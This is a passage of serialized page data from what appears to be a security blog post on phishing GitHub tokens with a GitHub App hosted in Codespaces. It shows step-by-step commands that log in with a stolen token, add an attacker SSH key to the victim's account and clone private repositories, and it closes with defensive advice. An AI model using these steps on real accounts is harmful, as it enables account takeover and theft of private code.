App.",[],"rich_text$3ba2bd7c-5851-4bae-a6fb-fa8fe4f043fe",{"variation":420,"version":487,"items":786,"primary":787,"id":801,"slice_type":511,"slice_label":13},[],{"eyebrow":13,"heading":788,"body":789,"cta_label":13,"cta_link":790,"aside_type":493,"aside_image":791,"aside_video":796,"aside_video_poster":797,"aside_video_reduced_motion":798,"aside_video_url":13,"aside_embed":799,"pardot_form_url":13,"form_submit_label":13,"form_variant":502,"form_heading":13,"redirect_on_success":800,"theme":505,"overlay_pattern":506,"background_continuation":507,"media_position":508,"aside_vertical_align":509},[],[],{"link_type":417},{"dimensions":792,"alt":13,"copyright":13,"url":793,"id":794,"edit":795},{"width":766,"height":767},"\u002F_prismic-media\u002F6cdb2dcd3b38fda9-MN4uoEWoSpirg0oH_e81e9458-7634-4c33-91b3-5f10298.png","MN4uoEWoSpirg0oH",{"x":17,"y":17,"zoom":18,"background":19},{"link_type":498},{},{},{},{"link_type":504},"content_block$4cb397f4-9c08-4bfa-8b5f-f6e1aee267a7",{"variation":420,"version":421,"items":803,"primary":804,"id":812,"slice_type":485,"slice_label":13},[],{"body":805},[806,809],{"type":430,"text":807,"spans":808},"You might argue that a simpler approach would be to just send the link to the authorisation page, but since it is served through a Codespace forwarded port, it may appear suspicious. Using the GitHub App URL, while requiring more user interaction, appears more trustworthy and credible.",[],{"type":430,"text":810,"spans":811},"Back in the Codespace session the username and token are logged to the terminal.",[],"rich_text$af085d9f-7849-4a67-861e-373bf80ca3a8",{"variation":420,"version":421,"items":814,"primary":815,"id":820,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":816},[817],{"type":543,"text":818,"spans":819},"2023\u002F01\u002F25 17:01:38 Username: target-user\n2023\u002F01\u002F25 17:01:38 Token:    ghu_h9YFdUN9vbK6KttWVn2ZrFU0qrn0eA4O5AHS",[],"code_block$e6c55080-80c7-4577-bd90-2bed272ef51d",{"variation":420,"version":421,"items":822,"primary":823,"id":845,"slice_type":485,"slice_label":13},[],{"body":824},[825,828,831,840],{"type":426,"text":826,"spans":827},"SSH Access",[],{"type":430,"text":829,"spans":830},"To gain access to the target user private repos we first need to authenticate with GitHub using the stolen access token.",[],{"type":430,"text":832,"spans":833},"For that we will use the GitHub CLI command gh auth login with the --with-token flag.",[834,837],{"start":835,"end":836,"type":439},44,57,{"start":838,"end":839,"type":439},67,79,{"type":430,"text":841,"spans":842},"In Codespaces, before using the GitHub CLI, we first need to remove the GITHUB_TOKEN environment variable.",[843],{"start":457,"end":844,"type":439},84,"rich_text$fe3c46f5-d6a5-44b4-9c12-e75c51107681",{"variation":420,"version":421,"items":847,"primary":848,"id":853,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":849},[850],{"type":543,"text":851,"spans":852},"$ unset GITHUB_TOKEN",[],"code_block$12cd1ff9-48fc-4e2e-b2c3-9a9895fdcc26",{"variation":420,"version":421,"items":855,"primary":856,"id":861,"slice_type":485,"slice_label":13},[],{"body":857},[858],{"type":430,"text":859,"spans":860},"Authenticate with GitHub using the stolen access token.",[],"rich_text$c15ad73b-d785-47e3-8083-4148e6daf850",{"variation":420,"version":421,"items":863,"primary":864,"id":869,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":865},[866],{"type":543,"text":867,"spans":868},"$ gh auth login --with-token\nghu_h9YFdUN9vbK6KttWVn2ZrFU0qrn0eA4O5AHS",[],"code_block$4355ccbc-8936-420b-9982-ef4b064d0556",{"variation":420,"version":421,"items":871,"primary":872,"id":880,"slice_type":485,"slice_label":13},[],{"body":873},[874],{"type":430,"text":875,"spans":876},"To verify the current authentication status of the GitHub CLI we can use the gh auth status command.",[877],{"start":878,"end":879,"type":439},77,91,"rich_text$3233873f-511e-43ac-a0d9-7e27683b0ae4",{"variation":420,"version":421,"items":882,"primary":883,"id":888,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":884},[885],{"type":543,"text":886,"spans":887},"$ gh auth status\ngithub.com\n  ✓ Logged in to github.com as target-user (oauth_token)\n  ✓ Git operations for github.com configured to use https protocol.\n  ✓ Token: *******************",[],"code_block$fa53106e-eb86-49a0-910c-211a323087fe",{"variation":420,"version":421,"items":890,"primary":891,"id":905,"slice_type":485,"slice_label":13},[],{"body":892},[893,896],{"type":430,"text":894,"spans":895},"Now that we have logged in to GitHub as target-user we can add a new SSH to access the target user private repos.",[],{"type":430,"text":897,"spans":898},"First generate a new public\u002Fprivate rsa key pair in the \\tmp folder using the ssh-keygen command.",[899,902],{"start":900,"end":901,"type":439},56,60,{"start":903,"end":904,"type":439},78,88,"rich_text$9961506d-42c8-4446-859c-841664993451",{"variation":420,"version":421,"items":907,"primary":908,"id":913,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":909},[910],{"type":543,"text":911,"spans":912},"$ ssh-keygen\nGenerating public\u002Fprivate rsa key pair.\nEnter file in which to save the key (\u002Fhome\u002Fcodespace\u002F.ssh\u002Fid_rsa): \u002Ftmp\u002Fid_rsa\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \u002Ftmp\u002Fid_rsa\nYour public key has been saved in \u002Ftmp\u002Fid_rsa.pub\nThe key fingerprint is:\nSHA256:3RZsuAP3dK16vndv+QCUC4SkC0VORDq4SPVS4ozHnY0 codespace@codespaces-d0244c\nThe key's randomart image is:\n+---[RSA 3072]----+\n|   o =*....      |\n|  *.==+... o . . |\n| o.*+Eo.. + B . .|\n|.....o . + O + . |\n|. .   . S + * .  |\n|           o o   |\n|            . o .|\n|             o o+|\n|              o+*|\n+----[SHA256]-----+",[],"code_block$b41b76df-ed97-4f50-a494-db119ee37958",{"variation":420,"version":421,"items":915,"primary":916,"id":921,"slice_type":485,"slice_label":13},[],{"body":917},[918],{"type":430,"text":919,"spans":920},"Add the SSH key to the target user GitHub account.",[],"rich_text$77f2457b-7a73-4fb5-994c-29eb5b2cf1c9",{"variation":420,"version":421,"items":923,"primary":924,"id":929,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":925},[926],{"type":543,"text":927,"spans":928},"$ gh ssh-key add \u002Ftmp\u002Fid_rsa.pub\n✓ Public key added to your account",[],"code_block$f7062515-5d42-4c2c-9d68-7962131501fa",{"variation":420,"version":421,"items":931,"primary":932,"id":937,"slice_type":485,"slice_label":13},[],{"body":933},[934],{"type":430,"text":935,"spans":936},"To verify list the SSH keys in the GitHub account.",[],"rich_text$ba6eb48e-8c88-4ccd-886c-8627364605bd",{"variation":420,"version":421,"items":939,"primary":940,"id":945,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":941},[942],{"type":543,"text":943,"spans":944},"$ gh ssh-key list\nTITLE                        ID        KEY                                                                                                                                                                                                                                                                                                 ADDED\ncodespace@codespaces-d0244c  76923897  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQUIfwh\u002FzlGM2jckjX4VGkN7W5fUowuco8lJdMLtTz8WtA7vhpWSK+KyBBASJfFqpT1JqJx3Wxiy5ReTfJ\u002FXAN4Um4rmofjoEgX5pVrl6M...LEWhT3LMzt6bru8oPMnK2P8dNNylimo\u002FXdlpFBzQWgI\u002Fa1LL38rGhlC0PgEBJjNebcLRVIVpUu\u002FIvjBvd8Jdt8xgPjebi60BGXHDfrWxdA52ZVudvUw2XiGU9rdeMzwGZCYjMRnMG\u002F++Wc=  0m",[],"code_block$3bf8daea-d773-4231-ab1f-19401af96d33",{"variation":420,"version":421,"items":947,"primary":948,"id":953,"slice_type":485,"slice_label":13},[],{"body":949},[950],{"type":430,"text":951,"spans":952},"Change to permissions of the private key.",[],"rich_text$6fa7ad6c-c33e-49aa-b87e-32b71aad4f95",{"variation":420,"version":421,"items":955,"primary":956,"id":961,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":957},[958],{"type":543,"text":959,"spans":960},"$ chmod 600 \u002Ftmp\u002Fid_rsa",[],"code_block$d8dbeb68-d71b-481f-8fc7-d8787ac53678",{"variation":420,"version":421,"items":963,"primary":964,"id":969,"slice_type":485,"slice_label":13},[],{"body":965},[966],{"type":430,"text":967,"spans":968},"Finally, use the SSH key to clone the target user private repository.",[],"rich_text$caf0d259-5427-4649-bb1d-0c798ce62f09",{"variation":420,"version":421,"items":971,"primary":972,"id":977,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":973},[974],{"type":543,"text":975,"spans":976},"$ GIT_SSH_COMMAND='ssh -i \u002Ftmp\u002Fid_rsa -o IdentitiesOnly=yes' git clone git@github.com:target-user\u002Fprivate.git\nCloning into 'private'...\nWarning: Permanently added the ECDSA host key for IP address '140.82.121.3' to the list of known hosts.\nremote: Enumerating objects: 8, done.\nremote: Counting objects: 100% (8\u002F8), done.\nremote: Compressing objects: 100% (6\u002F6), done.\nremote: Total 8 (delta 0), reused 5 (delta 0), pack-reused 0\nReceiving objects: 100% (8\u002F8), done.",[],"code_block$dfd2a3a2-6053-4c74-a370-a0181450ff8c",{"variation":420,"version":421,"items":979,"primary":980,"id":985,"slice_type":485,"slice_label":13},[],{"body":981},[982],{"type":430,"text":983,"spans":984},"We succeeded! We were able to carry out a campaign using only our phone without any cost!",[],"rich_text$63cfe097-bafe-489e-a867-f58ad658746e",{"variation":420,"version":421,"items":987,"primary":988,"id":993,"slice_type":547,"slice_label":13},[],{"language_label":13,"code":989},[990],{"type":543,"text":991,"spans":992},"$ cat private\u002FREADME.md\nPrivate repository!",[],"code_block$b8e38edd-cc55-4508-a19b-d936ab52d7dd",{"variation":420,"version":421,"items":995,"primary":996,"id":1032,"slice_type":485,"slice_label":13},[],{"body":997},[998,1001,1004,1008,1015,1020,1027],{"type":426,"text":999,"spans":1000},"Conclusion",[],{"type":430,"text":1002,"spans":1003},"GitHub Apps can be a powerful tool for automating tasks and integrating with other tools and services, but it's important to be aware of the potential for abuse and to take steps to protect yourself and your organization. Only install apps from trusted sources and never provide your GitHub tokens to an app or service unless you are sure that it is legitimate. If you suspect that an app is trying to phish for your GitHub tokens, report it to GitHub immediately.",[],{"type":1005,"text":1006,"spans":1007},"heading3","Read more",[],{"type":1009,"text":427,"spans":1010},"list-item",[1011],{"start":17,"end":1012,"type":604,"data":1013},11,{"link_type":606,"url":1014},"https:\u002F\u002Fdocs.github.com\u002Fen\u002Fdevelopers\u002Fapps\u002Fgetting-started-with-apps\u002Fabout-apps",{"type":1009,"text":1016,"spans":1017},"GitHub Codespaces",[1018],{"start":17,"end":482,"type":604,"data":1019},{"link_type":606,"url":607},{"type":1009,"text":1021,"spans":1022},"Hardening your GitHub Enterprise Server",[1023],{"start":17,"end":1024,"type":604,"data":1025},39,{"link_type":606,"url":1026},"https:\u002F\u002Fgithub.blog\u002F2020-07-20-hardening-your-github-enterprise-server\u002F",{"type":1009,"text":1028,"spans":1029},"Abusing a GitHub Codespaces Feature For Malware Delivery",[1030],{"start":17,"end":900,"type":604,"data":1031},{"link_type":606,"url":614},"rich_text$d21ad3f7-f31b-4d17-ab63-9a415919280a",1788466508462]